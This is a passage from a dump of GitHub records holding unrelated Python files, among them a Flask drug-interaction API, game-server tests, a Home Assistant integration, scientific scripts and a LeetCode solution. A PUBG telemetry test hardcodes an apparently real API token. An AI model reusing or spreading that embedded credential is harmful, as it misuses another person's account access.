drug_list = [item['name'].split(\" / \")[0] for item in drug_sent['drugList']]\n        untilDate_list = [item['untilDate'] for item in drug_sent['drugList']]\n        fromDate_list = [item['fromDate'] for item in drug_sent['drugList']]\n        symptom_list = [item['name'] for item in drug_sent['symptomList']]\n        severity_list = [item['severity'] for item in drug_sent['symptomList']]\n        appearDate_list = [item['appearDate'] for item in drug_sent['symptomList']]\n        isNewDrug_list = [item['isNewDrug'] for item in drug_sent['drugList']]\n\n        report_data = (\n            drug_list, fromDate_list, untilDate_list, severity_list, appearDate_list, symptom_list, real, isNewDrug_list)\n        print(report_data)\n        data_base = DB()\n        postgres_insert_query = \"\"\" INSERT INTO private_user_details (factor_name, email,phone,sector,medical_sector, real_data)\\\n            VALUES (%s,%s,%s,%s,%s,%s)\"\"\"\n        data_base.insert_data_row(postgres_insert_query, user_data)\n        postgres_insert_query = \"\"\"INSERT INTO report_details (drugs,fromDate,untilDate,severity,appearDate, symptoms, real_data,isNew) VALUES \\\n            (%s,%s,%s, %s,%s,%s,%s,%s) \"\"\"\n        data_base.insert_data_row(postgres_insert_query, report_data)\n        data_base.close_connection()\n\n\napi.add_resource(InteractionCheck, '/check')\napi.add_resource(InteractionStats, '/stats')\napi.add_resource(DrugSuggestions, '/suggest')\napi.add_resource(DrugSearch, '/drug-search')\napi.add_resource(SideEffectReport, '/side-effect-report')\napi.add_resource(SearchStats, '/search-stats')\napi.add_resource(NewDrug, '/new-drug')\n\nif __name__ == '__main__':\n    app.run(debug=True)\n","repo_name":"AmitLiberman/DrugcheQ-Back-End","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8779257769","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport asyncio\nfrom room import room\nfrom client import client\nfrom roommgr import roommgr\nimport worker\n\nclass fakews:\n    def __init__(self):\n        pass\n\n    async def send(self, msg):\n        name = worker.CLIENTS[self].name\n        print(\"sending to fake client: \" + name + \"; msg: \" + msg)\n\n\ndef printallclientinfo():\n    for k in worker.CLIENTS:\n        worker.CLIENTS[k].printinfo()\n\nasync def test():\n    wslist = []\n    for i in range(30):\n        ws = fakews()\n        wslist.append(ws)\n        c = client(ws)\n        worker.CLIENTS[ws] = c\n        # c.name = \"CLIENT\" + i\n        # c.icon = i % 10\n    i = 0\n    for k in worker.CLIENTS:\n        i = i + 1\n        c = worker.CLIENTS[k]\n        name = 'CLIENT_' + str(i)\n        req = {\n            'PROTO': 'REQ_REGISTER',\n            'NAME': name,\n            'ICON': i % 10\n        }\n        await worker.onregister(c, req)\n\n    printallclientinfo()\n\n    player0 = worker.CLIENTS[wslist[0]]\n    await worker.oncreateroom(player0, {\n        'PROTO': 'REQ_CREATE_ROOM',\n        'NAME': 'ROOM_1',\n        'ICON': '10001',\n        'MAXPLAYERS': 5,\n        'MATCHOVERSCORE': 20\n    })\n    player0.printinfo()\n    # printallclientinfo()\n\n    r0 = roommgr().getroom(\"1000000\")\n\n\n    player1 = worker.CLIENTS[wslist[1]]\n    await worker.getroomlist(player1, {})\n    await worker.joinroom_asplayer(player1, {\n        'PROTO': 'REQ_JOIN_ROOM_AS_PLAYER',\n        'ROOMID': \"1000000\"\n    })\n    player1.printinfo()\n\n    viewer0 = worker.CLIENTS[wslist[2]]\n    await worker.joinroom_asviewer(viewer0, {\n        'PROTO': 'REQ_JOIN_ROOM_AS_VIEWER',\n        'ROOMID': \"1000000\"\n    })\n    viewer0.printinfo()\n\n    player2 = worker.CLIENTS[wslist[3]]\n    await worker.joinroom_asplayer(player2, {\n        'PROTO': 'REQ_JOIN_ROOM_AS_PLAYER',\n        'ROOMID': \"1000000\"\n    })\n    player2.printinfo()\n    await 
worker.quitroom(player2, {})\n\n player3 = worker.CLIENTS[wslist[4]]\n viewer1 = worker.CLIENTS[wslist[5]]\n # await worker.joinroom_asplayer(player3, {\n # 'PROTO': 'REQ_JOIN_ROOM_AS_PLAYER',\n # 'ROOMID': \"1000000\"\n # })\n await worker.joinrandomroom(player3, {\n 'PROTO': 'REQ_JOIN_RANDOM_ROOM',\n })\n\n # await worker.joingame(viewer0, { 'PROTO': 'REQ_JOIN_GAME' })\n # return\n\n await worker.onreadyforplay(player0, {'PROTO': 'REQ_READY_FOR_PLAY'})\n await worker.onreadyforplay(player1, {'PROTO': 'REQ_READY_FOR_PLAY'})\n await worker.oncancelready(player1, {'PROTO': 'REQ_CANCEL_PLAY'})\n await worker.onreadyforplay(player1, {'PROTO': 'REQ_READY_FOR_PLAY'})\n\n # await worker.onreadyforplay(viewer0, {'PROTO': 'REQ_READY_FOR_PLAY'})\n\n await worker.onreadyforplay(player2, {'PROTO': 'REQ_READY_FOR_PLAY'})\n await worker.onreadyforplay(player3, {'PROTO': 'REQ_READY_FOR_PLAY'})\n\n # await worker.quitroom(player3, {'PROTO': 'REQ_QUIT_ROOM'})\n\n\n await worker.startround(player0, {'PROTO': 'REQ_START_ROUND'})\n # await worker.quitroom(player0, {'PROTO': 'REQ_QUIT_ROOM'})\n await worker.send_answer(player3, {\n 'PROTO': 'REQ_SEND_ANSWER',\n 'ANSWER': r0.answer\n })\n\n # await worker.quitroom(player1, {\n # 'PROTO': 'REQ_QUIT_ROOM',\n # })\n\n await worker.send_answer(player1, {\n 'PROTO': 'REQ_SEND_ANSWER',\n 'ANSWER': r0.answer\n })\n\n # await worker.startround(player1, {'PROTO': 'REQ_START_ROUND'})\n # await worker.send_answer(player3, {\n # 'PROTO': 'REQ_SEND_ANSWER',\n # 'ANSWER': r0.answer\n # })\n # await worker.send_answer(player0, {\n # 'PROTO': 'REQ_SEND_ANSWER',\n # 'ANSWER': r0.answer\n # })\n\n await worker.skipround(player1, {'PROTO': 'REQ_SKIP_ROUND'})\n await worker.startround(player3, {'PROTO': 'REQ_START_ROUND'})\n\n await worker.drawstart(player3, {'PROTO': 'REQ_DRAW_START'})\n await worker.draw(player3, {'PROTO': 'REQ_DRAW', 'STEPS': [1]})\n await worker.draw(player3, {'PROTO': 'REQ_DRAW', 'STEPS': [2]})\n await worker.draw(player3, {'PROTO': 'REQ_DRAW', 'STEPS': [3,4,5]})\n await worker.drawundo(player3, {})\n await worker.drawundo(player3, {})\n await worker.drawundo(player3, {})\n await worker.drawundo(player3, {})\n await worker.drawstart(player3, {})\n await worker.draw(player3, {'PROTO': 'REQ_DRAW', 'STEPS': [1]})\n await worker.drawstart(player3, {})\n await worker.draw(player3, {'PROTO': 'REQ_DRAW', 'STEPS': [2]})\n await worker.joinroom_asviewer(viewer1, {\n 'PROTO': 'REQ_JOIN_ROOM_AS_VIEWER',\n 'ROOMID': \"1000000\"\n })\n await worker.draw(player3, {'PROTO': 'REQ_DRAW', 'STEPS': [3,4,5]})\n await worker.send_answer(player1, {\n 'PROTO': 'REQ_SEND_ANSWER',\n 'ANSWER': r0.answer\n })\n await worker.send_answer(player0, {\n 'PROTO': 'REQ_SEND_ANSWER',\n 'ANSWER': r0.answer\n })\n\n # await worker.quitroom(player0, {})\n # await worker.quitroom(player1, {})\n # await worker.quitroom(player3, {})\n # await worker.quitroom(viewer0, {})\n\n\n await worker.getroomlist(player2, {})\n # printallclientinfo()\n # printallclientinfo()\n\n\ndef run():\n # asyncio.run(fill())\n loop = asyncio.get_event_loop()\n loop.run_until_complete(test())","repo_name":"IriskaDev/draw-and-guess-srv","sub_path":"testroutine.py","file_name":"testroutine.py","file_ext":"py","file_size_in_byte":5225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"32320276287","text":"\"\"\"\n======================\n@author:小谢学测试\n@time:2021/9/8:16:19\n@email:xie7791@qq.com\n======================\n\"\"\"\nimport pytest\nfrom selenium import 
webdriver\nimport time\nimport allure\n@allure.testcase(\"http://www.baidu.com\")\n@allure.feature(\"Baidu search\")\n@pytest.mark.parametrize('test_data1',['allure','pytest','unittest'])\ndef test_steps(test_data1):\n    with allure.step(\"Open the Baidu page\"):\n        driver = webdriver.Firefox()\n        driver.maximize_window()\n        driver.get(\"http://www.baidu.com\")\n    with allure.step(f\"Enter the search keyword: {test_data1}\"):\n        driver.find_element_by_id(\"kw\").send_keys(test_data1)\n\n        driver.find_element_by_id(\"su\").click()\n\n    with allure.step(\"Save the screenshot\"):\n        driver.save_screenshot(\"./result/b.png\")\n        allure.attach.file(\"./result/b.png\", attachment_type=allure.attachment_type.PNG)\n        allure.attach('Home page','Attach with HTML',allure.attachment_type.HTML)\n    with allure.step(\"Close the browser\"):\n        driver.quit()","repo_name":"xieIe-xie/hogwarts_test","sub_path":"test_baidu.py","file_name":"test_baidu.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21619754877","text":"\"\"\"The s05channel Integration.\"\"\"\nimport asyncio\nimport logging\nfrom datetime import timedelta\nfrom typing import Any\nimport glob\n\nimport async_timeout\nimport serial\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.const import (\n    CONF_HOST,\n    CONF_NAME,\n    CONF_SCAN_INTERVAL,\n    Platform,\n)\n\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers.device_registry import DeviceEntry\nfrom homeassistant.helpers.update_coordinator import DataUpdateCoordinator, UpdateFailed\n\nfrom .const import DOMAIN, ConfDefaultInt\n# ConfDefaultFlag,\nfrom .const import RetrySettings\n#ConfName,\nfrom .hub import DataUpdateFailed, HubInitFailed, S05ChannelMultiHub\n\n_LOGGER = logging.getLogger(__name__)\n_LOGGER.setLevel(logging.DEBUG)\n\nPLATFORMS: list[str] = [\n    Platform.SENSOR,\n]\n\nasync def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:\n    \"\"\"Set up an S0 meter.\"\"\"\n\n    _LOGGER.debug( \"!!!!!!!! 
async_setup_entry !!!!!!!!!!!!!!\" )\n _LOGGER.debug( entry.data )\n\n entry_updates: dict[str, Any] = {}\n if CONF_SCAN_INTERVAL in entry.data:\n data = {**entry.data}\n entry_updates[\"data\"] = data\n entry_updates[\"options\"] = {\n **entry.options,\n CONF_SCAN_INTERVAL: data.pop(CONF_SCAN_INTERVAL),\n }\n if entry_updates:\n hass.config_entries.async_update_entry(entry, **entry_updates)\n\n ports = glob.glob('/dev/ttyACM[0-9]*')\n _LOGGER.debug( ports )\n\n for port in ports:\n try:\n s = serial.Serial(port)\n s.close()\n\n _LOGGER.debug( port )\n _LOGGER.debug( entry.data[CONF_HOST] )\n if port == entry.data[CONF_HOST]:\n s05channel_hub = S05ChannelMultiHub(\n hass,\n entry.data[CONF_NAME],\n entry.data[CONF_HOST]\n )\n\n coordinator = S05ChannelCoordinator(\n hass,\n s05channel_hub,\n entry.options.get(CONF_SCAN_INTERVAL, ConfDefaultInt.SCAN_INTERVAL),\n )\n\n _LOGGER.debug(\"...................................\")\n _LOGGER.debug(entry.entry_id)\n hass.data.setdefault(DOMAIN, {})\n hass.data[DOMAIN][entry.entry_id] = {\n \"hub\": s05channel_hub,\n \"coordinator\": coordinator,\n }\n\n await coordinator.async_config_entry_first_refresh()\n\n await hass.config_entries.async_forward_entry_setups(entry, PLATFORMS)\n\n entry.async_on_unload(entry.add_update_listener(async_reload_entry))\n\n except Exception:\n pass\n\n return True\n\n\nasync def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:\n \"\"\"Unload a config entry.\"\"\"\n s05channel_hub = hass.data[DOMAIN][entry.entry_id][\"hub\"]\n await s05channel_hub.shutdown()\n\n unload_ok = await hass.config_entries.async_unload_platforms(entry, PLATFORMS)\n if unload_ok:\n hass.data[DOMAIN].pop(entry.entry_id)\n\n return unload_ok\n\n\nasync def async_reload_entry(hass: HomeAssistant, entry: ConfigEntry) -> None:\n \"\"\"Handle an options update.\"\"\"\n await hass.config_entries.async_reload(entry.entry_id)\n\n\nasync def async_remove_config_entry_device(\n hass: HomeAssistant, config_entry: ConfigEntry, device_entry: DeviceEntry\n) -> bool:\n \"\"\"Remove a config entry from a device.\"\"\"\n s05channel_hub = hass.data[DOMAIN][config_entry.entry_id][\"hub\"]\n\n known_devices = []\n\n for inverter in s05channel_hub.inverters:\n inverter_device_ids = {\n dev_id[1]\n for dev_id in inverter.device_info[\"identifiers\"]\n if dev_id[0] == DOMAIN\n }\n for dev_id in inverter_device_ids:\n known_devices.append(dev_id)\n\n for meter in s05channel_hub.meters:\n meter_device_ids = {\n dev_id[1]\n for dev_id in meter.device_info[\"identifiers\"]\n if dev_id[0] == DOMAIN\n }\n for dev_id in meter_device_ids:\n known_devices.append(dev_id)\n\n this_device_ids = {\n dev_id[1] for dev_id in device_entry.identifiers if dev_id[0] == DOMAIN\n }\n\n for device_id in this_device_ids:\n if device_id in known_devices:\n _LOGGER.error(f\"Failed to remove device entry: device {device_id} in use\")\n return False\n\n return True\n\n\nclass S05ChannelCoordinator(DataUpdateCoordinator):\n \"\"\"S05ChannelCoordinator.\"\"\"\n\n def __init__(\n self, hass: HomeAssistant, hub: S05ChannelMultiHub, scan_interval: int\n ):\n \"\"\"Init so channel coordinator.\"\"\"\n super().__init__(\n hass,\n _LOGGER,\n name=\"S05Channel Coordinator\",\n update_interval=timedelta(seconds=scan_interval),\n )\n self._hub = hub\n\n async def _async_update_data(self):\n try:\n async with async_timeout.timeout(self._hub.coordinator_timeout):\n return await self._refresh_s05channel_data_with_retry(\n ex_type=DataUpdateFailed,\n limit=RetrySettings.Limit,\n 
wait_ms=RetrySettings.Time,\n                    wait_ratio=RetrySettings.Ratio,\n                )\n\n        except HubInitFailed as e:\n            raise UpdateFailed(f\"{e}\")\n\n        except DataUpdateFailed as e:\n            raise UpdateFailed(f\"{e}\")\n\n    async def _refresh_s05channel_data_with_retry(\n        self,\n        ex_type=Exception,\n        limit=0,\n        wait_ms=100,\n        wait_ratio=2,\n    ):\n        \"\"\"Retry refresh until no exception occurs or retries exhaust.\"\"\"\n\n        _LOGGER.debug(\"_refresh_s05channel_data_with_retry\")\n        attempt = 1\n        while True:\n            try:\n                return await self._hub.async_refresh_s05channel_data()\n            except Exception as ex:\n                if not isinstance(ex, ex_type):\n                    raise ex\n                if 0 < limit <= attempt:\n                    _LOGGER.debug(f\"No more data refresh attempts (maximum {limit})\")\n                    raise ex\n\n                _LOGGER.debug(f\"Failed data refresh attempt #{attempt}\", exc_info=ex)\n\n                attempt += 1\n                _LOGGER.debug(\n                    f\"Waiting {wait_ms} ms before data refresh attempt #{attempt}\"\n                )\n                await asyncio.sleep(wait_ms / 1000)\n                wait_ms *= wait_ratio\n","repo_name":"Revenberg/s05channel","sub_path":"custom_components/s05channel/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35962635894","text":"import sys\nimport math\nimport numpy as np\nfrom datetime import datetime\nimport win32com.client #needed to load COM objects\nimport ephem\n\nutil = win32com.client.Dispatch(\"ASCOM.Utilities.Util\")\n\nclass TelescopeData():\n    def ConvertCoord(TRa, Tdec, TLst, TUtc):\n        #read telescope data\n        telRa = TRa\n        telDec = Tdec\n        telLST = TLst\n        telUTC = TUtc\n\n        #calculates HA in radians (1 hour = 0.2618 rad)\n        telHA = 0.2618*(telLST - telRa)\n        if telHA > math.pi:\n            telHA -= 2 * math.pi\n        if telHA < -math.pi:\n            telHA += 2 * math.pi\n        telHA = telHA/0.2618 #back to hours\n\n        #convert format \n        raCoord = util.HoursToHMS(telRa, \" \", \" \", \"\", 2)\n        decCoord = util.DegreesToDMS(telDec, \" \", \" \", \"\", 2)\n        haCoord = util.HoursToHMS(telHA, \" \", \" \", \"\", 2)\n        lstCoord = util.HoursToHMS(telLST, \" \", \" \", \"\", 2)\n        utcCoord = telUTC\n\n        return raCoord, decCoord, haCoord, lstCoord, utcCoord\n\n    def pointConvert(ra_point, dec_point):\n        Radouble = util.HMSToHours(ra_point)\n        DecDouble = util.DMSToDegrees(dec_point)\n\n        return Radouble, DecDouble\n    \n    def precess_coord(ra_target, dec_target):\n        # pyephem test\n        OPD=ephem.Observer()\n        OPD.lat='-22.5344'\n        OPD.lon='-45.5825'\n        OPD.date = datetime.utcnow()\n        # %% these parameters are for super-precise estimates, not necessary.\n        OPD.elevation = 1864 # meters\n        star = ephem.FixedBody()\n        star._ra = ephem.hours(ra_target.replace(\" \",\":\")) # in hours for RA\n        star._dec = ephem.degrees(dec_target.replace(\" \",\":\"))\n        star.compute(OPD)\n        ra_hms = str(star.ra).replace(\":\", \" \")\n        dec_dms = str(star.dec).replace(\":\", \" \")\n\n        return ra_hms, dec_dms\n    \n","repo_name":"ramonefoster/tcspd-bancada","sub_path":"Telescope/telescopeCoord.py","file_name":"telescopeCoord.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70944300370","text":"import glob\nimport re\nimport pyvista as pv #https://docs.pyvista.org/version/stable/user-guide/simple.html\nimport numpy as np\n\n#make sure a dpm from a timestep is not\n#present in the next one\n\n# filenames\nbase_dir = \"/home/dventuri/run/canal_30m/output/dpm/pvtp/vtp\"\nbase_fname = 
f\"{base_dir}/dpm_*_*.vtp\"\ntimestep_treshold = 60000\n\n# 'x' cutoff position\nx_cut = 29.9 # meters\n\n### function - sort numerically\ndef numericalSort(value):\n numbers = re.compile(r'(\\d+)') #regex to match any repeating numerical Unicode character\n parts = numbers.split(value) #splits the string using \"numbers\"\n parts = map(int, parts[1::2]) #returns only the numbers converted to ints\n return tuple(parts)\n\n### function - compare timesteps\ndef timestep_above(value, threshold):\n parts = numericalSort(value)\n return parts[-2] >= threshold #uses second to last number (last is partition number)\n\n# generate list o filenames to read (numerically sorted and only above timestep threshold)\nfnames = sorted(glob.glob(base_fname), key=numericalSort) #sorts the list of names using the converted numbers\nfnames = [fname for fname in fnames if timestep_above(fname, timestep_treshold)]\n\n# start iterating on files\ndpm_diam_all = []\nfor fname in fnames:\n # read vtp data\n dpm = pv.read(fname)\n\n # cehck if x_max < x_cutoff\n if (dpm.bounds[1] < x_cut): continue\n\n # print filename\n print('\\nReading file ', fname)\n\n # what are the mesh bounds?\n print('Bounds: ', dpm.bounds)\n\n # how many points are in this mesh\n print('Total points in file: ', dpm.n_points)\n\n # access a point data array inside de vtk\n dpm_diam = dpm.point_data['dpm_diameter']\n if (dpm_diam.size != dpm.n_points):\n raise ValueError(\"Wrong number of points for diameter point data\")\n\n # access dpm x position\n dpm_x = dpm.points[:,0]\n if (dpm_x.size != dpm.n_points):\n raise ValueError(\"Wrong number of points for position point data\")\n\n # filter only values at (x > x_cutoff)\n filter_arr = dpm_x > x_cut\n dpm_diam_filtered = dpm_diam[filter_arr]\n print('Points after filtering: ', dpm_diam_filtered.size)\n dpm_diam_all.append(dpm_diam_filtered)\n\n\n# consolidate complete vector\ndpm_diam_all = np.hstack(dpm_diam_all)\nprint('\\nTotal points: ', dpm_diam_all.size)\n\n# save array to file\nnp.savetxt('dpm_diam_all.txt', dpm_diam_all)\n","repo_name":"dventuri/vtk2python_read_dpm_MFSim","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40313740551","text":"from ..api.api_db import ApiDB\nfrom ..gp.gp_db import GameparamsDB\nfrom ..i18n.i18n_db import I18NDb\nfrom .warship_db import WarshipDB\n\npath = 'res/warships.sqlite'\n\n\ndef create_warships_db():\n\tapidb = ApiDB()\n\tgpm = GameparamsDB()\n\twarshipdb = WarshipDB()\n\ti18n = I18NDb()\n\twarshipdb.init_db()\n\n\tship_ids = apidb.list_all_ships()\n\tships = []\n\tfor name, ship_id_str in ship_ids:\n\t\tship = gpm.search_ship(ship_id_str, i18n)\n\t\tships.append((ship, name))\n\twarshipdb.insert_data(ships)\n","repo_name":"hiraki-uk/discord-wows-bot","sub_path":"init/warship/create_warship_db.py","file_name":"create_warship_db.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"10681109291","text":"from core.pubg import PUBG\nimport requests\nfrom PIL import Image, ImageDraw\nfrom telemetry.telemetry import Telemetry\nfrom constants.constants import Events\nimport json\n\n\ndef sem_api():\n key = 
'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJqdGkiOiIwMDQzNWU1MC0xODZiLTAxMzctNzM1OC0wZTM1MzFmZGJkNWEiLCJpc3MiOiJnYW1lbG9ja2VyIiwiaWF0IjoxNTUwNzk3MTU2LCJwdWIiOiJibHVlaG9sZSIsInRpdGxlIjoicHViZyIsImFwcCI6InB1YmctdGVhY2hlciJ9.zM2r5FJZP3IkcRVVFN1ApBDesf-JJn3QPAZyxNr2QR4'\n    plat = 'steam'\n    pubg = PUBG(key, plat)\n    \n    miramar = Image.open('miramar_original.jpg')\n    kill = Image.open('Death.png')\n    position = Image.open('position.png')\n\n    #t = Telemetry(telemetry.json(), Events.LogPlayerKill)\n    \n    with open('json/telemetry_1.json') as data:\n        t = pubg.get_telemetry_from_json(json.load(data), Events.LogPlayerKill)\n    for event in t.events:\n        x, y = event.victim.location.x, event.victim.location.y\n        miramar.paste(kill, (int(8000 * x / 816000), int(8000 * y / 816000)), kill)\n    \n    '''\n    count = 0\n    verify = 0\n\n    for ox, oy in t.player_kill():\n        miramar.paste(kill, (int(ox), int(oy)), kill)\n\n    for ox, oy, r in t.safety_zone_position():\n        draw = ImageDraw.Draw(miramar)\n        draw.ellipse((ox - r, oy - r, ox + r, oy + r), outline='green')\n\n    \n    if tele['_T'] == 'LogPlayerPosition':\n        if tele['character']['name'] == 'Tecnosh':\n            x = tele['character']['location']['x']\n            y = tele['character']['location']['y']\n\n            ox = 2048 * x / 816000\n            oy = 2048 * y / 816000\n            print(ox, oy)\n            erangel.paste(position, (int(ox), int(oy)), position)\n    '''\n    \n    miramar.show()\n    \nif __name__ == '__main__':\n    sem_api()","repo_name":"terafiros/PUBG","sub_path":"test_no_api.py","file_name":"test_no_api.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"3125039316","text":"\"\"\"Pi verification\"\"\"\nfrom decimal import Decimal as D\n\n\ndef correct_decimal_points(pi: D, file_name: str = \"src/pi.txt\") -> int:\n    \"\"\"Counts correct decimal points of approximated pi based on verification file\n\n    :param pi: approximated pi\n    :type pi: Decimal\n    :param file_name: path to verification file (decimal points separated by\n        newline)\n    :type file_name: str\n    :returns: correct decimal points\n    :rtype: int\n    \"\"\"\n    decimal_points = str(pi)[2:]  # remove \"3.\"\n\n    index = 0\n    correct = 0\n\n    with open(file_name) as f:\n        for line in f:\n            line = line[:1]  # keep only the first character (the digit before the line break)\n\n            if index < len(decimal_points) and line == decimal_points[index]:\n                correct += 1\n                index += 1\n            else:\n                break\n\n    return correct\n","repo_name":"umcconnell/archimedes-pi","sub_path":"src/verify.py","file_name":"verify.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"16892698581","text":"import http.server\nfrom prometheus_client import start_http_server, Counter\n\nREQUESTS = Counter('test_request_total', 'This is a counter test metric for Total Get requests')\n\nclass MyHandler(http.server.BaseHTTPRequestHandler):\n    def do_GET(self):\n        REQUESTS.inc()\n        self.send_response(200)\n        self.end_headers()\n        self.wfile.write(b\"test\")\n\nif __name__ == \"__main__\":\n    start_http_server(5001)\n    server = http.server.HTTPServer(('192.168.222.14', 5000), MyHandler)\n    server.serve_forever()\n\n\n","repo_name":"ProtoRiaan/PrometheustrainingUdemy","sub_path":"httpserver_test.py","file_name":"httpserver_test.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70355088212","text":"class Solution:\n    def findDuplicate(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: int\n        
\"\"\"\n if not nums: return \n slow = nums[0]\n fast = nums[0]\n entry = nums[0]\n \n while True:\n slow = nums[slow]\n fast = nums[nums[fast]]\n if slow == fast:\n break\n \n while slow != entry:\n slow = nums[slow]\n entry = nums[entry]\n return entry\n\n# Description:\n# Given an array nums containing n + 1 integers \n# where each integer is between 1 and n (inclusive), \n# prove that at least one duplicate number must exist. \n# Assume that there is only one duplicate number, \n# find the duplicate one.\n\n# Example 1:\n\n# Input: [1,3,4,2,2]\n# Output: 2\n# Example 2:\n\n# Input: [3,1,3,4,2]\n# Output: 3\n# Note:\n\n# You must not modify the array (assume the array is read only).\n# You must use only constant, O(1) extra space.\n# Your runtime complexity should be less than O(n2).\n# There is only one duplicate number in the array, \n# but it could be repeated more than once.\n#################################################\n\n# Solution:\n# Floyd's Tortoise and Hare (Cycle Detection)\n# See: 142-Linked List Cycle II\n# 有重复元素表示按照如下方式走,会有相遇,\n# 路径中环的entry即为重复元素\n# slow = nums[slow]\n# fast = nums[nums[fast]]\n\n# 参见142题解:\n# 1. 用slower和faster方法判断是否有环;\n# 2. 设链表的头节点是head,\n# 环的入口节点是entry, \n# slower和 faster 2个指针相遇的节点是meeting;\n# 3. 设L1是head到entry的正向距离,\n# L2是entry到meeting的正向距离,\n# C是环的长度,\n# n是faster指针在cycle里遍历的次数(不到一遍算0);\n\n# 根据上面的定义,可知:\n\n# 1. 当slower和faster相遇时,\n# slower已经走了L1 + L2的距离,\n# 也即head和meeting的距离;\n# 2. 当slower和faster相遇时,faster已经走了L1 + L2 + n * C的距离;\n# 3. 因为slower步进1,而faster步进2,\n# 那么当slower和faster第一次相遇时,\n# faster已经走的距离是slower已经走的距离的两倍,\n# 即 2* (L1 + L2) = L1 + L2 + n * C \n# => L1 = (n - 1) * C + (C - L2)\n\n# L1 = (n - 1) * C + (C - L2) 这个等式表明, \n# head和entry的距离(L1),等于meeting到entry的正向距离\n# (链表是有遍历方向的)。\n\n# Beats: 99.73%\n# Runtime: 40ms\n# medium","repo_name":"listenviolet/Lab","sub_path":"leetcode/287-Find-the-Duplicate-Number.py","file_name":"287-Find-the-Duplicate-Number.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24198391570","text":"import pandas as pd\r\nimport numpy as np\r\n\r\n\r\ndef read_orders(n_clients, path =\"/Users/yd953/PycharmProjects/instacard/orders.csv\"):\r\n orders_df = pd.read_csv(path)\r\n orders_df = orders_df[[\"order_id\",\"user_id\"]]\r\n return orders_df[orders_df['user_id'].isin(range(N+1))]\r\n\r\n\r\ndef read_orders_products(path = \"/Users/yd953/PycharmProjects/instacard/order_products__prior.csv\"):\r\n orders_products_df = pd.read_csv(path)\r\n return orders_products_df[['order_id','product_id']]\r\n\r\ndef read_products(path=\"/Users/yd953/PycharmProjects/instacard/products.csv\"):\r\n product_df = pd.read_csv(path)\r\n return product_df[['product_id','department_id']]\r\n\r\n\r\nN=5\r\ndef read_write_sample(N=5):\r\n\r\n product_df = read_products()\r\n #lire un exemple d'order ['order_id','user_id']\r\n orders_df = read_orders(N)\r\n\r\n #lire order product avec ['order_id','product_id']\r\n orders_prod_df = read_orders_products()\r\n\r\n #1er merge ['user_id','order_id','product_id']\r\n orders_prod_df = pd.merge(orders_df,orders_prod_df,how=\"inner\",on='order_id')\r\n\r\n #2eme merge ['user_id','order_id','product_id','department_id']\r\n orders_prod_df = pd.merge(orders_prod_df,product_df,on='product_id')\r\n\r\n #garger les colonnes ['user_id','order_id','department_id']\r\n orders_prod_df = orders_prod_df[['user_id','order_id','department_id']]\r\n\r\n #save echantillons\r\n 
orders_prod_df.to_csv(\"/Users/yd953/PycharmProjects/instacard/merge_sample.csv\")\r\n\r\nread_write_sample()\r\n\r\n\r\ndef user_table():\r\n user = pd.read_csv(\"/Users/yd953/PycharmProjects/instacard/merge_sample.csv\")\r\n user_col = pd.unique(user['user_id']).tolist()\r\n user_col = user_col[:5]\r\n rows = []\r\n\r\n for i in user_col:\r\n data = user[user['user_id']== i]\r\n order_col = pd.unique(data['order_id']).tolist()\r\n\r\n liste = []\r\n for j in order_col:\r\n liste.append(data[data['order_id']==j]['department_id'])\r\n rows.append([i,liste])\r\n df = pd.DataFrame(rows,columns = ['user_id','department_id'])\r\n print(df)\r\n return df\r\n\r\ndef one_hot_post_padding(matrix, max_categories_found,):\r\n '''\r\n Make a one hot matrix X after a padding\r\n Input:\r\n matrix after the padding\r\n max_categories_found = max of categorie found in every baskets\r\n Output:\r\n a one hot matrix as an array\r\n '''\r\n\r\n X_onehot = [] #our new onehot list of list of list in output\r\n\r\n for user in matrix:\r\n '''for each user'''\r\n L = [] #onehot of each user\r\n\r\n for order in user:\r\n '''for each basket in each user'''\r\n L1 = np.zeros(max_categories_found + 1) #onehot of each basket/order by user\r\n #print(order)\r\n\r\n for categorie in order:\r\n '''for each categorie in each order'''\r\n #print(categorie)\r\n c = int(categorie) #transform categorie from float to integer\r\n\r\n if c == 0:\r\n L1[c] = 0\r\n else:\r\n L1[c] = 1\r\n\r\n L.append(list(L1)) #append each order to each user in the list\r\n\r\n X_onehot.append(L) #append each user in one elist\r\n\r\n return list(X_onehot)\r\ndf_user = 